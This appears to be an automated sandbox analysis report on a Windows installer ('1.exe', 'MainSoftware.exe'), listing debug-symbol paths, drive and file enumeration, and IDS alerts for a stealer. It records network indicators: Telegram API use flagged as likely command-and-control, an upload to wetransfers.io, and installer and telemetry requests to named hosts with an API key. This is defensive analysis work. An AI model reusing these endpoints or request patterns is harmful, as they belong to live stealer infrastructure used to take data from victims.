    Source: Binary string: /_/artifacts/obj/netstandard/Release/net8.0-windows/netstandard.pdb source: MainSoftware.exe, 00000009.00000002.2455757141.0000024A2B141000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2455687451.0000024A2B118000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: C:\ReleaseAI\win\Release\stubs\x86\ExternalUi.pdb source: 1.exe, 1.exe, 00000000.00000000.1671191024.0000000000A19000.00000002.00000001.01000000.00000003.sdmp, 1.exe, 00000000.00000002.2583513984.0000000000A19000.00000002.00000001.01000000.00000003.sdmp, 1.exe, 00000004.00000002.2546889945.0000000000A19000.00000002.00000001.01000000.00000003.sdmp, 1.exe, 00000004.00000000.1876100284.0000000000A19000.00000002.00000001.01000000.00000003.sdmp
    Source: Binary string: System.Net.NameResolution.ni.pdb source: MainSoftware.exe, 00000009.00000002.2459749816.0000024A2D6ED000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2459831114.0000024A2D701000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Claims\Release\net8.0\System.Security.Claims.pdb source: MainSoftware.exe, 00000009.00000002.2472010152.0000024A304D7000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2472192330.0000024A304F1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2488823990.0000021DEA337000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Diagnostics.DiagnosticSource.ni.pdb source: MainSoftware.exe, 00000009.00000002.2456750245.0000024A2CF93000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2456841490.0000024A2CFC1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Numerics.Vectors\Release\net8.0\System.Numerics.Vectors.pdb source: MainSoftware.exe, 00000009.00000002.2459117236.0000024A2D5C1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2459006147.0000024A2D5BC000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Threading.ni.pdb source: MainSoftware.exe, 00000009.00000002.2452853423.0000020993BF1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2457323456.0000024A2D22B000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.Net/Release/net8.0-windows/System.Net.pdb source: MainSoftware.exe, 00000009.00000002.2459006147.0000024A2D5B7000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/src/Serilog.Sinks.Http/obj/Release/netstandard2.1/Serilog.Sinks.Http.pdb source: MainSoftware.exe, 00000009.00000002.2454027142.0000020995879000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2455666591.0000024A2B101000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: C:\Users\Admin\Distributor\Bundle Project\MSIInstaller\obj\Release\net8.0\win-x64\linked\MSIInstaller.pdb source: 1.exe, 00000000.00000003.1953629935.000000000C7C0000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: /_/artifacts/obj/System.Numerics/Release/net8.0-windows/System.Numerics.pdb source: MainSoftware.exe, 00000009.00000002.2454686724.0000024A2A3D0000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.InteropServices\Release\net8.0\System.Runtime.InteropServices.pdb source: MainSoftware.exe, 00000009.00000002.2458132025.0000024A2D3B1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2458048833.0000024A2D395000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.AppContext/Release/net8.0-windows/System.AppContext.pdbSHA256 source: MainSoftware.exe, 00000009.00000002.2459150036.0000024A2D5D5000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.ComponentModel.EventBasedAsync\Release\net8.0\System.ComponentModel.EventBasedAsync.pdb source: MainSoftware.exe, 00000009.00000002.2457807688.0000024A2D342000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Net.NetworkInformation.ni.pdb source: MainSoftware.exe, 00000009.00000002.2473142423.0000024A30971000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2472689319.0000024A3095A000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: #.Pdb source: 1.exe, 00000000.00000003.1953629935.000000000D3CB000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000009.00000002.2460054054.0000024A2D721000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: wininet.pdb source: 1.exe, 00000000.00000003.1702765989.0000000009BF5000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1886484951.00000000075B7000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.Text.Encodings.Web.ni.pdb source: MainSoftware.exe, 00000009.00000002.2458636879.0000024A2D55A000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2458853975.0000024A2D571000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\ShortcutFlags.pdb source: 1.exe, 00000000.00000003.1697942133.0000000009B5F000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: System.Collections.Concurrent.ni.pdb source: MainSoftware.exe, 00000009.00000002.2459307961.0000024A2D601000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2459150036.0000024A2D5DD000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Diagnostics.Process.ni.pdb source: MainSoftware.exe, 00000009.00000002.2457655754.0000024A2D2E3000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2457768047.0000024A2D311000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2507733360.0000021DED853000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.ComponentModel.Primitives.ni.pdb source: MainSoftware.exe, 00000009.00000002.2457909781.0000024A2D361000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2457807688.0000024A2D349000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2473396348.000001DD50A71000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.NetworkInformation\Release\net8.0-windows\System.Net.NetworkInformation.pdb source: MainSoftware.exe, 00000009.00000002.2473142423.0000024A30971000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2472689319.0000024A3095A000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Private.Uri.ni.pdb source: MainSoftware.exe, 00000009.00000002.2457601992.0000024A2D271000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2457473544.0000024A2D247000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections\Release\net8.0\System.Collections.pdb source: MainSoftware.exe, 00000009.00000002.2453520509.0000020993E71000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2453570792.0000020993EA9000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.Text.Encoding/Release/net8.0-windows/System.Text.Encoding.pdb source: MainSoftware.exe, 00000009.00000002.2458636879.0000024A2D556000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\FileOperations.pdb source: 1.exe, 00000000.00000003.1697942133.0000000009B5F000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\dlls\mscordac\mscordaccore.pdb source: 1.exe, 00000000.00000003.1953629935.000000000C63F000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, MainSoftware.exe, 00000009.00000000.2403069778.00007FF7A2BF8000.00000002.00000001.01000000.0000000A.sdmp, SoftwareDistributor.exe
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Security\Release\net8.0-windows\System.Net.Security.pdbSHA256 source: MainSoftware.exe, 00000009.00000002.2456889306.0000024A2CFF9000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2456992556.0000024A2D041000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2485790532.0000021DE9E29000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.Win32.Registry\Release\net8.0-windows\Microsoft.Win32.Registry.pdb source: MainSoftware.exe, 00000009.00000002.2458406613.0000024A2D411000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2458284663.0000024A2D3F7000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.DiagnosticSource\Release\net8.0\System.Diagnostics.DiagnosticSource.pdb source: MainSoftware.exe, 00000009.00000002.2456750245.0000024A2CF93000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2456841490.0000024A2CFC1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Collections.NonGeneric.ni.pdb source: MainSoftware.exe, 00000009.00000002.2457944763.0000024A2D371000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2458017065.0000024A2D381000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.Threading.Timer/Release/net8.0-windows/System.Threading.Timer.pdb source: MainSoftware.exe, 00000009.00000002.2457323456.0000024A2D227000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Process\Release\net8.0-windows\System.Diagnostics.Process.pdb source: MainSoftware.exe, 00000009.00000002.2457655754.0000024A2D2E3000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2457768047.0000024A2D311000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2507733360.0000021DED853000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\ShortcutFlags.pdbE source: 1.exe, 00000000.00000003.1697942133.0000000009B5F000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: /_/artifacts/obj/System.Diagnostics.Debug/Release/net8.0-windows/System.Diagnostics.Debug.pdb source: MainSoftware.exe, 00000009.00000002.2456750245.0000024A2CF90000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Overlapped\Release\net8.0\System.Threading.Overlapped.pdb source: MainSoftware.exe, 00000009.00000002.2459714008.0000024A2D6D1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2459648718.0000024A2D6C2000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2487984945.0000021DEA262000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Memory.ni.pdb source: MainSoftware.exe, 00000009.00000002.2472309573.0000024A3051C000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2472443393.0000024A30531000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.Win32.Primitives\Release\net8.0\Microsoft.Win32.Primitives.pdb source: MainSoftware.exe, 00000009.00000002.2458284663.0000024A2D3F3000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2459614069.0000024A2D6B1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2487954749.0000021DEA251000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/Microsoft.Extensions.Configuration.Abstractions/Release/net7.0/Microsoft.Extensions.Configuration.Abstractions.pdb source: MainSoftware.exe, 00000009.00000002.2455788652.0000024A2B160000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2455841322.0000024A2B181000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2483109037.0000021DE7F90000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/src/Serilog.Formatting.Compact/obj/Release/net8.0/Serilog.Formatting.Compact.pdb source: MainSoftware.exe, 00000009.00000002.2454007339.0000020995861000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2453659363.0000020993F08000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.ThreadPool\Release\net8.0\System.Threading.ThreadPool.pdb source: MainSoftware.exe, 00000009.00000002.2459866027.0000024A2D713000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2471490361.0000024A30481000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2486428981.0000021DEA053000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2488400492.0000021DEA2C1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Text.Encoding.Extensions\Release\net8.0\System.Text.Encoding.Extensions.pdbSHA2560 source: MainSoftware.exe, 00000009.00000002.2458636879.0000024A2D552000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2499468698.0000021DED3A2000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Security\Release\net8.0-windows\System.Net.Security.pdb source: MainSoftware.exe, 00000009.00000002.2456889306.0000024A2CFF9000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2456992556.0000024A2D041000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2485790532.0000021DE9E29000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: 1.exe, 00000000.00000003.1697942133.0000000009B5F000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: System.Security.Cryptography.ni.pdb source: MainSoftware.exe, 00000009.00000002.2457056110.0000024A2D096000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2457231097.0000024A2D161000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2486216479.0000021DE9F91000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.AppContext/Release/net8.0-windows/System.AppContext.pdb source: MainSoftware.exe, 00000009.00000002.2459150036.0000024A2D5D5000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Http.Json\Release\net8.0\System.Net.Http.Json.pdb source: MainSoftware.exe, 00000009.00000002.2458168635.0000024A2D3CA000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2458251640.0000024A2D3E1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Runtime.InteropServices.ni.pdb source: MainSoftware.exe, 00000009.00000002.2458132025.0000024A2D3B1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2458048833.0000024A2D395000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Linq\Release\net8.0\System.Linq.pdbSHA256R source: MainSoftware.exe, 00000009.00000002.2453611805.0000020993ED3000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2453831581.00000209957C1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2482080339.0000021DE7E51000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/Microsoft.Extensions.Primitives/Release/net7.0/Microsoft.Extensions.Primitives.pdb source: MainSoftware.exe, 00000009.00000002.2453861770.00000209957F2000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\Prereq.pdb source: 1.exe, 00000000.00000003.1697942133.0000000009B5F000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\Corehost.Static\singlefilehost.pdb source: 1.exe, 00000000.00000003.1953629935.000000000BE14000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000009.00000002.2489752761.00007FF7A2A1D000.00000002.00000001.01000000.0000000A.sdmp, MainSoftware.exe, 00000009.00000000.2402662552.00007FF7A2A1D000.00000002.00000001.01000000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Text.Encodings.Web\Release\net8.0\System.Text.Encodings.Web.pdb source: MainSoftware.exe, 00000009.00000002.2458636879.0000024A2D55A000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2458853975.0000024A2D571000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Http\Release\net8.0-windows\System.Net.Http.pdb source: MainSoftware.exe, 00000009.00000002.2455864746.0000024A2B198000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2455976436.0000024A2B241000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2483529829.0000021DE8071000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.ComponentModel.Primitives\Release\net8.0\System.ComponentModel.Primitives.pdb source: MainSoftware.exe, 00000009.00000002.2457909781.0000024A2D361000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2457807688.0000024A2D349000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2473396348.000001DD50A71000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Sockets\Release\net8.0-windows\System.Net.Sockets.pdb source: MainSoftware.exe, 00000009.00000002.2459347730.0000024A2D621000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2459431055.0000024A2D661000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Intrinsics\Release\net8.0\System.Runtime.Intrinsics.pdb source: MainSoftware.exe, 00000009.00000002.2458900009.0000024A2D594000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2458980017.0000024A2D5A1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Net.Http.ni.pdb source: MainSoftware.exe, 00000009.00000002.2455864746.0000024A2B198000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2455976436.0000024A2B241000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2483529829.0000021DE8071000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime\Release\net8.0\System.Runtime.pdb source: MainSoftware.exe, 00000009.00000002.2453468583.0000020993E61000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2453402629.0000020993E53000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.Buffers/Release/net8.0-windows/System.Buffers.pdb source: MainSoftware.exe, 00000009.00000002.2459150036.0000024A2D5D9000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2487355105.0000021DEA179000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\SoftwareDetector.pdb source: 1.exe, 00000000.00000003.1697942133.00000000099F0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Text.Encoding.Extensions\Release\net8.0\System.Text.Encoding.Extensions.pdb source: MainSoftware.exe, 00000009.00000002.2458636879.0000024A2D552000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2499468698.0000021DED3A2000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\lzmaextractor.pdb source: 1.exe, 00000000.00000003.1697942133.00000000099F0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Principal.Windows\Release\net8.0-windows\System.Security.Principal.Windows.pdb source: MainSoftware.exe, 00000009.00000002.2471636608.0000024A30491000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2471927266.0000024A304B1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2488653015.0000021DEA2F1000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.ThreadPool\Release\net8.0\System.Threading.ThreadPool.pdbSHA2560 source: MainSoftware.exe, 00000009.00000002.2459866027.0000024A2D713000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2471490361.0000024A30481000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2486428981.0000021DEA053000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2488400492.0000021DEA2C1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Net.Primitives.ni.pdb source: MainSoftware.exe, 00000009.00000002.2456147251.0000024A2B321000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2456047128.0000024A2B2FB000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2483635124.0000021DE812B000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2483816012.0000021DE8151000.00000020.00000001.00040000.0000000A.sdmp
    Source: C:\Users\user\Desktop\1.exeFile opened: z:Jump to behavior
    Source: C:\Users\user\Desktop\1.exeFile opened: x:Jump to behavior
    Source: C:\Users\user\Desktop\1.exeFile opened: v:Jump to behavior
    Source: C:\Users\user\Desktop\1.exeFile opened: t:Jump to behavior
    Source: C:\Users\user\Desktop\1.exeFile opened: r:Jump to behavior
    Source: C:\Users\user\Desktop\1.exeFile opened: p:Jump to behavior
    Source: C:\Users\user\Desktop\1.exeFile opened: n:Jump to behavior
    Source: C:\Users\user\Desktop\1.exeFile opened: l:Jump to behavior
    Source: C:\Users\user\Desktop\1.exeFile opened: j:Jump to behavior
    Source: C:\Users\user\Desktop\1.exeFile opened: h:Jump to behavior
    Source: C:\Users\user\Desktop\1.exeFile opened: f:Jump to behavior
    Source: C:\Users\user\Desktop\1.exeFile opened: b:Jump to behavior
    Source: C:\Users\user\Desktop\1.exeFile opened: y:Jump to behavior
    Source: C:\Users\user\Desktop\1.exeFile opened: w:Jump to behavior
    Source: C:\Users\user\Desktop\1.exeFile opened: u:Jump to behavior
    Source: C:\Users\user\Desktop\1.exeFile opened: s:Jump to behavior
    Source: C:\Users\user\Desktop\1.exeFile opened: q:Jump to behavior
    Source: C:\Users\user\Desktop\1.exeFile opened: o:Jump to behavior
    Source: C:\Users\user\Desktop\1.exeFile opened: m:Jump to behavior
    Source: C:\Users\user\Desktop\1.exeFile opened: k:Jump to behavior
    Source: C:\Users\user\Desktop\1.exeFile opened: i:Jump to behavior
    Source: C:\Users\user\Desktop\1.exeFile opened: g:Jump to behavior
    Source: C:\Users\user\Desktop\1.exeFile opened: e:Jump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeFile opened: c:
    Source: C:\Users\user\Desktop\1.exeFile opened: a:Jump to behavior
    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_008B63A0 FindFirstFileW,GetLastError,FindClose,0_2_008B63A0
    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_008E2630 FindFirstFileW,FindClose,CloseHandle,CloseHandle,0_2_008E2630
    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_007754C0 FindClose,PathIsUNCW,FindFirstFileW,GetFullPathNameW,GetFullPathNameW,FindClose,SetLastError,0_2_007754C0
    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_008DC670 FindFirstFileW,FindClose,0_2_008DC670
    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_008C5040 FindFirstFileW,FindClose,FindClose,0_2_008C5040
    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_008B5A60 FindFirstFileW,FindFirstFileW,FindClose,FindClose,0_2_008B5A60
    Source: C:\Users\user\Desktop\1.exeCode function: 4_2_007754C0 FindClose,PathIsUNCW,FindFirstFileW,GetFullPathNameW,GetFullPathNameW,FindClose,SetLastError,4_2_007754C0
    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_00794BB0 GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLastError,0_2_00794BB0
    Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\
    Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\
    Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\
    Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\
    Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Users\user\AppData\Local\Adobe\
    Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\
    Source: C:\Program Files (x86)\Main\Chop\Install.exeCode function: 4x nop then push rbx15_2_00007FF7D3CE1FF0
    Source: C:\Program Files (x86)\Main\Chop\Install.exeCode function: 4x nop then push rbx15_2_00007FF7D3CE1FF0
    Source: C:\Program Files (x86)\Main\Chop\Install.exeCode function: 4x nop then mov dword ptr [rcx+48h], 80131500h15_2_00007FF7D3D5DD60

    Networking

    barindex
    Suricata IDS alerts for network traffic
    Source: Network trafficSuricata IDS: 2829202 - Severity 1 - ETPRO MALWARE MSIL/Zbrain PUP/Stealer Installer UA : 192.168.2.4:49740 -> 104.21.80.136:443
    Source: Network trafficSuricata IDS: 2829202 - Severity 1 - ETPRO MALWARE MSIL/Zbrain PUP/Stealer Installer UA : 192.168.2.4:49741 -> 104.21.80.136:443
    System process connects to network (likely due to code injection or exploit)
    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 104.21.59.228 443
    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 149.154.167.220 443
    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 34.160.111.145 80
    Uses the Telegram API (likely for C&C communication)
    Source: unknownDNS query: name: api.telegram.org
    Source: global trafficHTTP traffic detected: POST /install/new HTTP/1.1Host: jonatechlab.comX-API-Key: 123e4567-e89b-12d3-a456-426614174000Transfer-Encoding: chunkedContent-Type: application/json; charset=utf-8
    Source: global trafficHTTP traffic detected: GET /install/whattoinstall/3a9ad13f-de6d-43be-b899-593fefcb45ef HTTP/1.1Host: jonatechlab.comX-API-Key: 123e4567-e89b-12d3-a456-426614174000
    Source: global trafficHTTP traffic detected: POST /logs/telemetry HTTP/1.1Host: jonatechlab.comContent-Type: application/jsonContent-Length: 660
    Source: global trafficHTTP traffic detected: GET /install/getfiles/Chop/Install.exe HTTP/1.1Host: jonatechlab.comX-API-Key: 123e4567-e89b-12d3-a456-426614174000
    Source: global trafficHTTP traffic detected: POST /logs/telemetry HTTP/1.1Host: jonatechlab.comContent-Type: application/jsonContent-Length: 133
    Source: global trafficHTTP traffic detected: POST /logs/telemetry HTTP/1.1Host: jonatechlab.comContent-Type: application/jsonContent-Length: 172
    Source: global trafficHTTP traffic detected: GET /install/getfiles/Chop/Chop.pkg HTTP/1.1Host: jonatechlab.comX-API-Key: 123e4567-e89b-12d3-a456-426614174000
    Source: global trafficHTTP traffic detected: POST /logs/telemetry HTTP/1.1Host: jonatechlab.comContent-Type: application/jsonContent-Length: 375
    Source: global trafficHTTP traffic detected: POST /logs/telemetry HTTP/1.1Host: swiftvantage.onlineContent-Type: application/jsonContent-Length: 1330
    Source: global trafficHTTP traffic detected: POST /logs/telemetry HTTP/1.1Host: swiftvantage.onlineContent-Type: application/jsonContent-Length: 178
    Source: global trafficHTTP traffic detected: POST /uplo.php HTTP/1.1Host: wetransfers.ioAccept: */*Content-Length: 11232Content-Type: multipart/form-data; boundary=------------------------RPAKxtPhi0ELJgoR012pqZ
    Source: global trafficHTTP traffic detected: POST /logs/telemetry HTTP/1.1Host: swiftvantage.onlineContent-Type: application/jsonContent-Length: 276
    Source: global trafficHTTP traffic detected: POST /tools/create HTTP/1.1Host: swiftvantage.onlineContent-Type: application/json; charset=utf-8Content-Length: 57
    Source: global trafficHTTP traffic detected: GET /tools/domains HTTP/1.1Host: swiftvantage.online
    Source: global trafficHTTP traffic detected: POST /logs/telemetry HTTP/1.1Host: swiftvantage.onlineContent-Type: application/jsonContent-Length: 114
    Source: global trafficHTTP traffic detected: POST /logs/telemetry HTTP/1.1Host: swiftvantage.onlineContent-Type: application/jsonContent-Length: 1216
